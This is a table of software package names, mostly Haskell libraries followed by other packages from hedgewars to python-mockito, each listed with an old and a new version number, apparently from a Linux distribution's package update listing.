       haskell-cabal-install-parsers           0.6.1.1-12           0.6.1.1-16
                 haskell-casa-client             0.0.3-32             0.0.3-36
                  haskell-casa-types             0.0.3-24             0.0.3-27
                       haskell-cborg          0.2.10.0-86          0.2.10.0-88
                  haskell-cborg-json          0.2.6.0-101          0.2.6.0-103
                  haskell-cheapskate          0.1.1.2-861          0.1.1.2-864
                    haskell-checkers            0.6.0-257            0.6.0-258
                     haskell-chimera          0.4.1.0-144          0.4.1.0-146
                          haskell-ci            0.16.6-48            0.16.6-52
                    haskell-citeproc           0.8.1.1-84           0.8.1.1-86
                   haskell-clash-lib             1.8.2-97            1.8.2-100
               haskell-clash-prelude             1.8.2-89             1.8.2-92
              haskell-classy-prelude           1.5.0.3-81           1.5.0.3-84
                haskell-coinbase-pro          0.9.3.2-435          0.9.3.2-439
       haskell-commonmark-extensions            0.2.5.6-5            0.2.5.6-6
           haskell-commonmark-pandoc           0.2.2.3-46           0.2.2.3-48
                     haskell-concise          0.1.0.1-660          0.1.0.1-662
                     haskell-conduit          1.3.6.1-133          1.3.6.1-135
               haskell-conduit-extra             1.3.8-76             1.3.8-78
               haskell-conduit-parse          0.2.1.1-311          0.2.1.1-313
               haskell-config-schema          1.3.0.0-234          1.3.0.0-236
          haskell-constraints-extras           0.4.0.2-54           0.4.0.2-56
               haskell-contravariant              1.5.5-6              1.5.6-1
        haskell-contravariant-extras            0.3.5.4-6            0.3.5.4-7
                   haskell-criterion           1.6.3.0-47           1.6.3.0-49
       haskell-criterion-measurement           0.2.3.0-57           0.2.3.0-59
             haskell-crypton-conduit            0.2.3-219            0.2.3-221
          haskell-crypton-connection             0.4.5-26             0.4.5-28
          haskell-cryptonite-conduit            0.2.2-792            0.2.2-794
                         haskell-dav            1.3.4-874            1.3.4-879
                        haskell-dbus             1.3.3-73             1.3.3-76
               haskell-dbus-hslogger          0.1.0.1-676          0.1.0.1-679
              haskell-deferred-folds           0.9.18.8-2           0.9.18.8-4
        haskell-dense-linear-algebra          0.1.0.0-444          0.1.0.0-446
               haskell-dependent-map            0.4.0.1-9           0.4.0.1-11
               haskell-dependent-sum          0.7.2.0-219          0.7.2.0-221
      haskell-dependent-sum-template           0.2.0.2-17           0.2.0.2-19
                       haskell-deque          0.4.4.2-114          0.4.4.2-116
              haskell-deriving-aeson           0.2.10-131           0.2.10-133
                      haskell-docopt          0.7.0.8-151          0.7.0.8-153
                haskell-doctemplates          0.11.0.1-76          0.11.0.1-78
            haskell-doctest-discover          0.2.0.0-213          0.2.0.0-215
                      haskell-either             5.0.3-79             5.0.3-80
                  haskell-enummapset          0.7.3.0-139          0.7.3.0-141
                   haskell-esqueleto           3.5.11.0-8           3.5.11.1-4
                  haskell-fdo-notify            0.3.1-922            0.3.1-925
                        haskell-feed          1.3.2.1-330          1.3.2.1-332
                    haskell-floskell           0.10.8-189           0.10.8-191
                       haskell-focus          1.0.3.2-186          1.0.3.2-188
                       haskell-foldl            1.4.18-93            1.4.18-94
                    haskell-fourmolu           0.13.1.0-5           0.14.0.0-2
                        haskell-free              5.2-124              5.2-125
                    haskell-fsnotify           0.4.4.0-40           0.4.4.0-42
                haskell-generic-data           1.1.0.2-66           1.1.0.2-68
                haskell-generic-lens          2.2.2.0-200          2.2.2.0-202
                   haskell-ghc-check          0.5.0.8-150          0.5.0.8-151
              haskell-ghc-exactprint            1.7.1.0-9           1.7.1.0-10
                      haskell-ghcide           2.2.0.0-16            2.3.0.0-5
           haskell-ghcide-test-utils          1.9.0.0-292          1.9.0.0-299
                          haskell-gi           0.26.16-10           0.26.16-12
                      haskell-gi-atk            2.0.28-38            2.0.28-40
                    haskell-gi-cairo            1.0.30-31            1.0.30-33
          haskell-gi-cairo-connector            0.1.1-313            0.1.1-315
                 haskell-gi-dbusmenu            0.4.14-33            0.4.14-35
             haskell-gi-dbusmenugtk3           0.4.15-130           0.4.15-132
                haskell-gi-freetype2             2.0.5-41             2.0.5-43
                      haskell-gi-gdk            4.0.9-106            4.0.9-108
                     haskell-gi-gdk3            3.0.29-30            3.0.29-32
                  haskell-gi-gdk3x11             3.0.15-6             3.0.16-1
                haskell-gi-gdkpixbuf           2.0.32-142           2.0.32-144
                   haskell-gi-gdkx11            4.0.8-129            4.0.8-131
                      haskell-gi-gio            2.0.38-25            2.0.38-27
                     haskell-gi-glib            2.0.30-59            2.0.30-61
                  haskell-gi-gmodule             2.0.6-43             2.0.6-45
                  haskell-gi-gobject            2.0.31-75            2.0.31-77
                 haskell-gi-graphene             1.0.8-68             1.0.8-70
                      haskell-gi-gsk             4.0.8-55             4.0.8-57
                      haskell-gi-gtk            4.0.11-32            4.0.11-34
                   haskell-gi-gtk-hs           0.3.17-101           0.3.17-103
                     haskell-gi-gtk3            3.0.43-13            3.0.43-15
                 haskell-gi-harfbuzz           0.0.10-147           0.0.10-149
                    haskell-gi-pango            1.0.30-36            1.0.30-38
                     haskell-gi-xlib            2.0.14-93            2.0.14-95
                     haskell-git-lfs             1.2.5-78             1.2.5-81
                     haskell-githash          0.1.6.3-345          0.1.6.3-348
                haskell-gtk-sni-tray          0.1.8.1-394          0.1.8.1-397
                   haskell-gtk-strut          0.1.3.2-348          0.1.3.2-350
                  haskell-hackage-db            2.1.3-191            2.1.3-193
            haskell-hackage-security           0.6.3.2-13           0.6.3.2-15
             haskell-haddock-library           1.11.0-184           1.11.0-188
                     haskell-hadrian     0.1.0.0+9.6.6-16     0.1.0.0+9.6.6-19
                      haskell-hakyll          4.16.4.0-25          4.16.4.0-31
            haskell-happstack-server             7.9.3-24             7.9.3-25
                       haskell-hasql          1.5.0.5-114            1.6.1.1-2
    haskell-hasql-dynamic-statements          0.3.1.1-280            0.3.1.2-2
             haskell-hasql-implicits          0.1.0.5-316          0.1.0.5-320
         haskell-hasql-notifications           0.2.0.5-89           0.2.0.5-93
                  haskell-hasql-pool          0.5.2.2-399            0.8.0.2-2
           haskell-hasql-transaction          1.0.1.1-421            1.0.1.2-2
            haskell-hedgehog-classes          0.2.5.4-216          0.2.5.4-218
                        haskell-here           1.2.14-135           1.2.14-136
                    haskell-hie-bios           0.12.0-159           0.12.0-161
                 haskell-hledger-lib               1.52-6               1.52-8
haskell-hls-alternate-number-format-plugin     2.2.0.0-16            2.3.0.0-5
        haskell-hls-cabal-fmt-plugin           2.2.0.0-16            2.3.0.0-5
            haskell-hls-cabal-plugin           2.2.0.0-16            2.3.0.0-5
   haskell-hls-call-hierarchy-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-change-type-signature-plugin       2.2.0.0-16            2.3.0.0-5
            haskell-hls-class-plugin           2.2.0.0-16            2.3.0.0-5
       haskell-hls-code-range-plugin           2.2.0.0-16            2.3.0.0-5
             haskell-hls-eval-plugin           2.2.0.0-16            2.3.0.0-5
  haskell-hls-explicit-fixity-plugin           2.2.0.0-16            2.3.0.0-5
 haskell-hls-explicit-imports-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-explicit-record-fields-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-floskell-plugin           2.2.0.0-16            2.3.0.0-5
         haskell-hls-fourmolu-plugin           2.2.0.0-17            2.3.0.0-5
             haskell-hls-gadt-plugin           2.2.0.0-17            2.3.0.0-5
                   haskell-hls-graph           2.2.0.0-12            2.3.0.0-4
            haskell-hls-hlint-plugin           2.2.0.0-16            2.3.0.0-5
      haskell-hls-module-name-plugin           2.2.0.0-16            2.3.0.0-5
           haskell-hls-ormolu-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-overloaded-record-dot-plugin       2.2.0.0-16            2.3.0.0-5
              haskell-hls-plugin-api           2.2.0.0-15            2.3.0.0-4
          haskell-hls-pragmas-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-qualify-imported-names-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-refactor-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-rename-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-retrie-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-splice-plugin           2.2.0.0-17            2.3.0.0-5
  haskell-hls-stylish-haskell-plugin           2.2.0.0-16            2.3.0.0-5
              haskell-hls-test-utils           2.2.0.0-16            2.3.0.0-5
                     haskell-hoauth2            2.14.0-16            2.14.0-19
                    haskell-hopenpgp           2.10.1-121           2.10.1-124
                       haskell-hpack            0.38.0-21            0.38.0-24
                       haskell-hslua            2.3.0-203            2.3.0-206
                 haskell-hslua-aeson           2.3.1.1-51           2.3.1.1-54
               haskell-hslua-classes             2.3.1-30             2.3.1-31
                  haskell-hslua-core             2.3.2-34             2.3.2-35
                  haskell-hslua-list             1.1.4-29             1.1.4-30
           haskell-hslua-marshalling            2.3.1-141            2.3.1-142
      haskell-hslua-module-doclayout             1.2.0-11             1.2.0-14
           haskell-hslua-module-path            1.1.1-105            1.1.1-108
         haskell-hslua-module-system             1.1.2-54             1.1.2-55
           haskell-hslua-module-text          1.1.0.1-168          1.1.0.1-169
        haskell-hslua-module-version            1.1.1-147            1.1.1-150
            haskell-hslua-module-zip             1.1.3-47             1.1.3-48
     haskell-hslua-objectorientation             2.3.1-49             2.3.1-50
             haskell-hslua-packaging            2.3.1-151            2.3.1-152
                  haskell-hslua-repl            0.1.2-147            0.1.2-148
                haskell-hslua-typing            0.1.1-143            0.1.1-144
                   haskell-hspec-wai           0.11.1-639           0.11.1-642
              haskell-hspec-wai-json           0.11.0-710           0.11.0-713
                haskell-hsyaml-aeson           0.2.0.2-58           0.2.0.2-60
                         haskell-htf          0.15.0.2-68          0.15.0.2-70
                haskell-html-conduit          1.3.2.2-388          1.3.2.2-390
                        haskell-http         4000.4.1-398         4000.4.1-401
                 haskell-http-client            0.7.19-58            0.7.19-60
      haskell-http-client-restricted            0.1.0-198            0.1.0-201
             haskell-http-client-tls          0.3.6.4-137          0.3.6.4-140
                haskell-http-conduit          2.3.9.1-197          2.3.9.1-200
               haskell-http-download          0.2.1.0-327          0.2.1.0-330
                haskell-http-streams          0.8.9.9-292          0.8.9.9-295
                       haskell-http2             5.1.0-17             5.1.0-19
                       haskell-http3             0.0.9-21             0.0.9-23
                  haskell-httpd-shed          0.4.1.2-108          0.4.1.2-109
               haskell-hw-fingertree          0.1.2.1-194          0.1.2.1-196
           haskell-hw-hspec-hedgehog          0.1.1.1-213          0.1.1.1-215
                     haskell-hw-prim          0.6.3.2-213          0.6.3.2-215
                         haskell-hxt         9.3.1.22-234         9.3.1.22-235
                haskell-implicit-hie           0.1.4.0-78           0.1.4.0-80
         haskell-implicit-hie-cradle          0.5.0.1-192          0.5.0.1-194
          haskell-incremental-parser            0.5.1-166            0.5.1-167
   haskell-insert-ordered-containers          0.2.5.3-200          0.2.5.3-203
                 haskell-interpolate            0.2.1-468            0.2.1-469
    haskell-interpolatedstring-perl6            1.0.2-405            1.0.2-406
                   haskell-invariant             0.6.4-94             0.6.4-95
                       haskell-ipynb              0.2-283              0.2-285
              haskell-ipython-kernel           0.12.0.0-8          0.12.0.0-10
           haskell-isomorphism-class             0.1.1-92             0.1.1-94
                 haskell-ixset-typed          0.5.1.0-314          0.5.1.0-316
                        haskell-jose             0.10-256             0.10-259
                   haskell-js-jquery            3.7.1-107            3.7.1-110
              haskell-kan-extensions             5.2.7-85             5.2.7-87
                        haskell-keys             3.12.5-5             3.12.5-6
                    haskell-kvitable            1.1.1.1-7           1.1.1.1-10
           haskell-lambdabot-trusted          5.3.1.2-244          5.3.1.2-247
                  haskell-lambdahack         0.11.0.1-190         0.11.0.1-193
             haskell-language-server           2.2.0.0-19            2.3.0.0-5
                    haskell-lattices             2.2.1-96             2.2.1-97
                        haskell-lens              5.3.4-1              5.3.4-3
                 haskell-lens-action            0.2.6-329            0.2.6-331
                  haskell-lens-aeson            1.2.3-202            1.2.3-205
                     haskell-libyaml            0.1.4-161            0.1.4-163
                      haskell-linear            1.23.2-47            1.23.2-49
                      haskell-list-t           1.0.5.7-63           1.0.5.7-65
                    haskell-lrucache           1.2.0.1-26           1.2.0.1-27
                         haskell-lsp           2.2.0.0-10           2.2.0.0-13
                    haskell-lsp-test          0.16.0.0-11          0.16.0.0-14
                   haskell-lsp-types            2.0.2.0-9           2.0.2.0-12
               haskell-lua-arbitrary          1.0.1.1-135            1.0.1.2-1
                  haskell-lumberjack          1.0.3.0-172          1.0.3.0-173
                  haskell-microaeson           0.1.0.3-43           0.1.0.3-45
             haskell-microlens-aeson            2.5.2-151            2.5.2-153
                 haskell-microstache          1.0.2.3-212          1.0.2.3-214
                  haskell-mime-types            0.1.2.0-4            0.1.2.1-1
                       haskell-mmark          0.0.7.6-346          0.0.7.6-348
                         haskell-mod           0.2.1.0-30           0.2.1.0-32
                  haskell-modern-uri          0.3.6.1-147          0.3.6.1-148
              haskell-monad-dijkstra          0.1.1.5-193          0.1.1.5-195
                haskell-monad-logger           0.3.42-113           0.3.42-115
            haskell-mono-traversable         1.0.21.0-135         1.0.21.0-137
  haskell-mono-traversable-instances          0.1.1.0-386          0.1.1.0-389
                    haskell-mustache           2.4.3.1-72           2.4.3.1-76
          haskell-mutable-containers          0.3.4.1-242          0.3.4.1-244
                  haskell-named-text           1.2.2.0-13           1.2.2.0-16
          haskell-neat-interpolation          0.5.1.4-199          0.5.1.4-201
                 haskell-network-uri          2.6.4.2-137          2.6.4.2-138
                        haskell-oeis           0.3.10.2-6           0.3.10.2-9
                   haskell-one-liner              2.1.1-2              2.1.1-3
             haskell-optparse-simple          0.1.1.4-535          0.1.1.4-538
                      haskell-ormolu           0.6.0.0-13           0.6.0.0-15
                       haskell-pager          0.1.1.0-218          0.1.1.0-220
                      haskell-pandoc               3.5-12                3.6-2
           haskell-pandoc-lua-engine             0.3.3-14                0.4-2
          haskell-pandoc-lua-marshal             0.2.9-15              0.3.0-1
               haskell-pandoc-server           0.1.0.10-3           0.1.0.10-9
                haskell-pandoc-types           1.23.1-164           1.23.1-166
                      haskell-pantry           0.8.2.2-32           0.8.2.2-36
         haskell-parameterized-utils           2.1.11.0-9          2.1.11.0-12
                        haskell-path              0.9.6-9             0.9.6-11
                     haskell-path-io            1.8.2-140            1.8.2-142
                  haskell-persistent          2.14.5.2-58          2.14.5.2-61
            haskell-persistent-mysql         2.13.1.5-100         2.13.1.5-103
       haskell-persistent-postgresql          2.13.5.2-24          2.13.5.2-27
               haskell-persistent-qq          2.12.0.7-73          2.12.0.7-76
           haskell-persistent-sqlite          2.13.1.1-66          2.13.1.1-69
             haskell-persistent-test         2.13.1.3-208         2.13.1.3-211
                  haskell-pipes-http            1.0.6-770            1.0.6-773
                     haskell-pointed            5.0.5-125            5.0.5-127
           haskell-postgresql-binary           0.12.5-267           0.12.5-270
           haskell-postgresql-simple          0.6.5.1-112          0.6.5.1-114
        haskell-prettyprinter-interp          0.2.0.0-157          0.2.0.0-158
                   haskell-prim-uniq              0.2-250              0.2-252
            haskell-primitive-extras         0.10.2.2-131         0.10.2.2-134
                 haskell-profunctors             5.6.3-82             5.6.3-83
            haskell-project-template          0.2.1.0-508          0.2.1.0-510
                         haskell-ptr         0.16.8.7-128         0.16.8.7-130
                        haskell-quic             0.1.27-3             0.1.27-5
          haskell-quickcheck-classes          0.6.5.0-342          0.6.5.0-344
                         haskell-ral             0.2.2-54             0.2.2-56
                      haskell-rebase            1.20.2-14            1.20.2-16
                   haskell-recaptcha          0.1.0.4-379          0.1.0.4-382
           haskell-recursion-schemes            5.2.3-141            5.2.3-142
                    haskell-reducers           3.12.5-125           3.12.5-126
                    haskell-refinery          0.4.0.0-317          0.4.0.0-318
                         haskell-req            3.13.4-32            3.13.4-35
                        haskell-rere           0.2.0.2-13           0.2.0.2-15
                    haskell-rerebase            1.20.2-14            1.20.2-16
                      haskell-retrie            1.2.3-159            1.2.3-161
                 haskell-rio-orphans          0.1.2.0-486          0.1.2.0-488
             haskell-rio-prettyprint           0.1.8.0-69           0.1.8.0-71
                   haskell-row-types           1.0.1.2-66           1.0.1.2-68
                    haskell-safecopy          0.10.4.3-57          0.10.4.3-59
                       haskell-sandi              0.5-597              0.5-599
                    haskell-sandwich           0.2.2.0-20           0.2.2.0-22
                      haskell-scotty             0.22-203             0.22-206
                        haskell-sdl2          2.5.5.1-128          2.5.5.1-131
                    haskell-sdl2-ttf            2.1.3-278            2.1.3-281
                   haskell-semialign             1.3.1-58             1.3.1-59
               haskell-semigroupoids              6.0.2-3              6.0.2-4
                   haskell-serialise          0.2.6.1-174          0.2.6.1-176
                     haskell-servant          0.20.3.0-52          0.20.3.0-54
              haskell-servant-client          0.20.3.0-67          0.20.3.0-71
         haskell-servant-client-core          0.20.3.0-52          0.20.3.0-54
              haskell-servant-server          0.20.3.0-67          0.20.3.0-70
             haskell-servant-swagger            1.2.1-153            1.2.1-156
                       haskell-shake           0.19.6-387           0.19.6-390
                 haskell-shakespeare             2.1.7-14            2.1.7.1-2
             haskell-simple-sendfile           0.2.32-196           0.2.32-198
                 haskell-skylighting             0.14.4-3             0.14.4-5
            haskell-skylighting-core             0.14.4-3             0.14.4-5
     haskell-skylighting-format-ansi              0.1-293              0.1-295
haskell-skylighting-format-blaze-html         0.1.1.3-147          0.1.1.3-149
  haskell-skylighting-format-context          0.1.0.2-257          0.1.0.2-259
    haskell-skylighting-format-latex              0.1-292              0.1-294
                   haskell-snap-core          1.0.5.1-210          1.0.5.1-211
                 haskell-snap-server          1.1.2.1-362          1.1.2.1-365
                   haskell-sourcemap            0.1.7-299            0.1.7-301
                    haskell-src-meta            0.8.15-90            0.8.15-91
                  haskell-statistics           0.16.4.0-9          0.16.4.0-11
        haskell-status-notifier-item            0.3.2.0-2            0.3.2.0-5
              haskell-stm-containers          1.2.1.1-160          1.2.1.1-164
                    haskell-stm-hamt          1.2.1.1-132              1.2.2-3
                       haskell-store           0.7.20-137           0.7.20-139
                     haskell-streams            3.3.3-125            3.3.3-127
                 haskell-strict-list          0.1.7.6-132          0.1.7.6-134
          haskell-string-interpolate          0.3.4.0-143          0.3.4.0-144
                  haskell-structured            0.1.1-319            0.1.1-321
                    haskell-summoner            2.1.0.0-2            2.1.0.0-6
                haskell-summoner-tui            2.1.0.0-2            2.1.0.0-6
                    haskell-swagger2            2.8.10-98           2.8.10-101
           haskell-tagstream-conduit            0.5.6-536            0.5.6-538
haskell-tamarin-prover-accountability            1.12.0-6             1.12.0-8
       haskell-tamarin-prover-export             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-sapic             1.12.0-6             1.12.0-8
         haskell-tamarin-prover-term             1.12.0-6             1.12.0-8
       haskell-tamarin-prover-theory             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-utils             1.12.0-6             1.12.0-8
                 haskell-tar-conduit            0.4.1-191            0.4.1-193
             haskell-tasty-checklist           1.0.8.0-10           1.0.8.0-13
                 haskell-tasty-hslua            1.1.1-139            1.1.1-140
                   haskell-tasty-lua           1.1.1.1-72           1.1.1.1-73
                 haskell-tasty-sugar           2.2.2.1-85           2.2.2.1-88
                     haskell-tdigest            0.3.1-150            0.3.1-152
                     haskell-texmath         0.12.8.11-15          0.12.8.12-1
                haskell-text-builder            0.6.7-283            0.6.7-285
            haskell-text-builder-dev          0.3.3.2-244          0.3.3.2-246
                   haskell-th-compat             0.1.6-87              0.1.7-1
                  haskell-th-desugar               1.16-3               1.16-4
                      haskell-th-env            0.1.1-164            0.1.1-165
                  haskell-th-orphans            0.13.17-4            0.13.17-5
                haskell-th-utilities          0.2.5.2-102          0.2.5.2-103
                         haskell-tls             2.0.6-71             2.0.6-73
         haskell-tls-session-manager             0.0.6-21             0.0.6-23
                   haskell-tree-diff          0.3.0.1-229              0.3.1-3
                    haskell-trifecta            2.1.4-174            2.1.4-176
                      haskell-turtle            1.6.2-161            1.6.2-162
                       haskell-typst               0.6-19              0.6.1-1
               haskell-typst-symbols              0.1.6-2              0.1.7-1
        haskell-uri-bytestring-aeson          0.1.0.9-133          0.1.0.9-135
                  haskell-uri-encode          1.5.0.7-319          1.5.0.7-320
                         haskell-vec             0.5.1-52             0.5.1-54
           haskell-vector-algorithms          0.9.1.0-123          0.9.1.0-125
              haskell-vector-builder          0.3.8.6-139          0.3.8.6-141
            haskell-vector-instances             3.4.3-77             3.4.3-79
                haskell-vector-sized            1.6.1-155            1.6.1-157
            haskell-wai-app-file-cgi            3.1.11-20            3.1.11-23
              haskell-wai-app-static            3.1.9-233            3.1.9-236
                 haskell-wai-conduit          3.0.0.4-714          3.0.0.4-716
                   haskell-wai-extra            3.1.18-41            3.1.18-44
          haskell-wai-handler-launch          3.0.3.1-811          3.0.3.1-814
             haskell-wai-http2-extra            0.1.3-376            0.1.3-379
       haskell-wai-middleware-static            0.9.3-192            0.9.3-195
                        haskell-warp             3.4.0-19             3.4.0-22
                   haskell-warp-quic            0.0.0-435            0.0.0-438
                    haskell-warp-tls            3.4.9-191            3.4.9-194
                       haskell-weigh           0.0.18-122           0.0.18-124
                       haskell-what4               1.6-78               1.6-81
                   haskell-wide-word           0.1.8.1-33           0.1.8.1-35
                   haskell-with-utf8          1.1.0.0-131          1.1.0.0-132
            haskell-wl-pprint-extras          3.5.0.5-560          3.5.0.5-561
          haskell-wl-pprint-terminfo          3.7.1.4-560          3.7.1.4-561
                        haskell-wreq            0.5.4.4-3            0.5.4.4-7
                        haskell-wuss           2.0.1.6-31           2.0.1.6-33
                      haskell-xcffib             1.6.1-14             1.6.1-15
           haskell-xdg-desktop-entry            0.1.1.3-2            0.1.1.3-3
                 haskell-xml-conduit          1.9.1.4-150          1.9.1.4-152
                  haskell-xml-hamlet            0.5.0.3-8           0.5.0.3-11
                      haskell-xmlgen          0.6.2.2-191          0.6.2.2-192
                haskell-xss-sanitize          0.3.7.2-131          0.3.7.2-132
                        haskell-yaml        0.11.11.2-205        0.11.11.2-207
                       haskell-yesod          1.6.2.1-460          1.6.2.1-464
                  haskell-yesod-auth         1.6.11.3-282         1.6.11.3-286
                  haskell-yesod-core         1.6.27.1-115         1.6.27.1-119
                  haskell-yesod-form            1.7.9.2-2            1.7.9.2-6
            haskell-yesod-persistent          1.6.0.8-520          1.6.0.8-524
                haskell-yesod-static          1.6.1.0-979          1.6.1.0-983
                  haskell-yesod-test           1.6.23-134           1.6.23-138
                           hedgewars             1.0.3-19             1.0.3-21
                               hefur               1.0-35               1.0-36
                               hepmc              3.3.1-7              3.3.1-8
                          hepmc-docs              3.3.1-7              3.3.1-8
                             hindent              6.1.1-6              6.1.1-8
                               hiprt      3.1.0.cb09c56-2      3.1.0.cb09c56-3
                             hledger               1.52-6              1.52-10
                        hledger-iadd            1.3.22-17            1.3.22-19
                          hledger-ui               1.52-7              1.52-11
                         hledger-web              1.52-10              1.52-14
                               hlint              3.6.1-8             3.6.1-10
                              hoogle         5.0.18.4-265         5.0.18.4-268
                      hopenpgp-tools           0.23.11-40           0.23.11-44
              hsa-amd-aqlprofile-bin              7.1.0-1              7.1.0-2
                           hslua-cli             1.4.3-87             1.4.3-88
                       i3status-rust             0.36.0-1             0.36.1-1
                               iaito              5.9.9-1              6.1.2-1
                      ibus-libpinyin             1.16.0-4             1.16.1-1
                               idris            1.3.4-478            1.3.4-481
                            ihaskell           0.13.0.0-9          0.13.0.0-12
                               incus             6.22.0-1             6.23.0-1
                         incus-tools             6.22.0-1             6.23.0-1
                              jasper              4.2.8-1              4.2.9-1
                          jasper-doc              4.2.8-1              4.2.9-1
                     jellyfin-ffmpeg          1:7.1.3p3-2          1:7.1.3p4-1
                                jolt              1.2.0-2              1.2.0-3
                               kicad             10.0.0-1             10.0.0-2
                          kitinerary            25.12.3-2            25.12.3-3
                              kmonad             0.4.4-89             0.4.4-91
                       kosmindoormap            25.12.3-1            25.12.3-2
                   libedataserverui4             3.58.3-1             3.58.3-2
                               libhx                5.3-1                5.4-1
              libperconaserverclient            8.4.8_8-1            8.4.8_8-2
                      libphonenumber           1:9.0.27-1           1:9.0.27-2
                            libsbsms              2.3.0-5              2.3.0-6
                           libsigrok             0.5.2-25             0.5.2-26
                           libtg_owt    0.git33.26068e2-1    0.git33.26068e2-2
                              libvlc             3.0.22-1             3.0.22-2
                              libvpx             1.16.0-2             1.16.0-3
                      libwireplumber             0.5.13-2             0.5.14-1
                              libwmf             0.2.13-4             0.2.14-1
                              libxdp              1.6.2-1              1.6.3-1
                          lincity-ng             2.14.2-2             2.14.2-3
                           lostfiles               4.14-1               4.15-1
                        lua-luarocks             3.13.0-4             3.13.0-5
                      lua51-luarocks             3.13.0-4             3.13.0-5
                      lua52-luarocks             3.13.0-4             3.13.0-5
                      lua53-luarocks             3.13.0-4             3.13.0-5
                      lua54-luarocks             3.13.0-4             3.13.0-5
                              luajit2.1.1774638290+fbb36bb-12.1.1774896198+18b087c-1
                            luarocks             3.13.0-4             3.13.0-5
                                mako             1.10.0-1             1.11.0-1
                              marble            25.12.3-1            25.12.3-2
                       marble-behaim            25.12.3-1            25.12.3-2
                       marble-common            25.12.3-1            25.12.3-2
                         marble-maps            25.12.3-1            25.12.3-2
                           marble-qt            25.12.3-1            25.12.3-2
                              maxima             5.49.0-7             5.49.0-8
                          maxima-ecl             5.49.0-7             5.49.0-8
                          maxima-fas             5.49.0-7             5.49.0-8
                         maxima-sbcl             5.49.0-7             5.49.0-8
                             melange             0.46.1-1             0.47.0-1
                          merkaartor            0.20.0-20            0.20.0-21
                               mgard              1.6.0-5              1.6.0-6
                           mighttpd2             4.0.4-25             4.0.4-28
                            migraphx              7.2.0-1              7.2.0-2
                           miniupnpd              2.3.9-2             2.3.10-1
                                mise           2026.3.8-1          2026.3.17-1
                               mixxx              2.5.4-2              2.5.4-3
                     mkdocs-material              9.7.5-1              9.7.6-1
                                moor             2.11.1-1             2.12.0-1
                                mosh             1.4.0-28             1.4.0-29
                           mosquitto             2.0.22-2              2.1.2-1
                              mumble            1.5.857-5            1.5.857-6
                       mumble-server            1.5.857-5            1.5.857-6
                              nageru              2.3.2-2              2.3.2-3
                                ncnn           20260113-3           20260113-4
                               ndctl                 82-1                 83-1
                             neovide             0.15.2-2             0.16.0-1
                              neovim             0.11.6-1             0.11.7-1
                             netdata              2.9.0-1              2.9.0-2
               netfilter-fullconenat      r73.0cf3b48-503      r73.0cf3b48-504
                    nextcloud-client           2:33.0.0-1           2:33.0.1-1
                             ngspice               45.2-2                 46-1
                              nickel             1.16.0-2             1.16.0-3
                         nickel-docs             1.16.0-2             1.16.0-3
              nickel-language-server             1.16.0-2             1.16.0-3
                         nodejs-yaml              2.3.1-1              2.3.2-1
                   npm-check-updates             19.5.0-1             19.6.0-1
                                nrpe              4.1.1-1              4.1.2-1
                              nsjail               3.4-22               3.4-23
                              ollama             0.18.3-1             0.19.0-1
                         ollama-cuda             0.18.3-1             0.19.0-1
                         ollama-docs             0.18.3-1             0.19.0-1
                         ollama-rocm             0.18.3-1             0.19.0-1
                       ollama-vulkan             0.18.3-1             0.19.0-1
                                onnx           1:1.20.1-1           1:1.20.1-2
                     onnxruntime-cpu             1.24.4-3             1.24.4-4
                    onnxruntime-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
                    onnxruntime-rocm             1.24.4-3             1.24.4-4
                   open-policy-agent             1.15.0-1             1.15.1-1
                            opencode              1.3.3-1              1.3.8-1
                              opencv             4.13.0-3             4.13.0-4
                         opencv-cuda             4.13.0-3             4.13.0-4
                      opencv-samples             4.13.0-3             4.13.0-4
                             openrgb             1.0rc2-5             1.0rc2-6
                          pandoc-cli               3.5-18                3.6-2
                     pandoc-crossref           0.3.19-182           0.3.19-188
                         pandoc-plot            1.9.1-256            1.9.1-263
                         pandora_box             0.20.0-1             0.20.1-1
                            paraview             6.0.1-10             6.0.1-11
                            pd-sfizz             1.2.3-12             1.2.3-13
                      percona-server            8.4.8_8-1            8.4.8_8-2
              percona-server-clients            8.4.8_8-1            8.4.8_8-2
             perl-business-isbn-data       20260325.001-1       20260328.001-1
                         perl-libwww               6.81-2               6.82-1
                     perl-xml-parser               2.48-1               2.49-1
                            php-grpc             1.78.1-2             1.80.0-1
                     php-legacy-grpc             1.78.1-2             1.80.0-1
                     platformio-core             6.1.19-1             6.1.19-3
                platformio-core-udev             6.1.19-1             6.1.19-3
                      podman-desktop             1.25.1-1             1.26.2-1
                           postgrest           10.0.0-532             10.1.0-2
                            protobuf               33.1-4               34.1-1
                          protobuf-c              1.5.2-8              1.5.2-9
                      proton-vpn-cli              0.1.7-1              0.1.8-1
                  proton-vpn-gtk-app             4.15.0-1             4.15.1-1
                   protonmail-bridge             3.23.1-1             3.23.1-2
              protonmail-bridge-core             3.23.1-1             3.23.1-2
                        prusa-slicer              2.9.4-7              2.9.4-8
                           pt2-clone               1.85-1               1.87-1
                     python-cairosvg              2.8.2-1              2.9.0-1
                 python-cinderclient              9.7.0-1              9.8.0-1
                   python-cloudflare             2.15.1-1             2.16.0-1
               python-configargparse              1.7.3-1              1.7.4-1
                    python-curl_cffi             0.14.0-6             0.14.0-7
                     python-deepdiff              8.1.1-1              8.2.0-1
                     python-eth-hash              0.7.1-1              0.8.0-1
                        python-faker             40.9.0-1            40.10.0-1
                  python-fastnumbers              5.1.1-2              5.1.1-3
                     python-flasgger            0.9.7.1-7                    -
                python-flask-restful             0.3.10-6                    -
                        python-gdstk             0.9.46-1             0.9.47-1
     python-googleapis-common-protos             1.73.0-1             1.73.1-1
                       python-grpcio             1.78.1-2             1.80.0-1
                 python-grpcio-tools             1.78.1-2             1.80.0-1
                     python-identify             2.6.17-1             2.6.18-2
           python-importlib-metadata              8.7.1-3              9.0.0-1
                  python-json-logger              4.0.0-1              4.1.0-1
                         python-lmdb              2.1.1-1              2.2.0-1
                      python-mockito              2.0.0-1              2.0.1-1
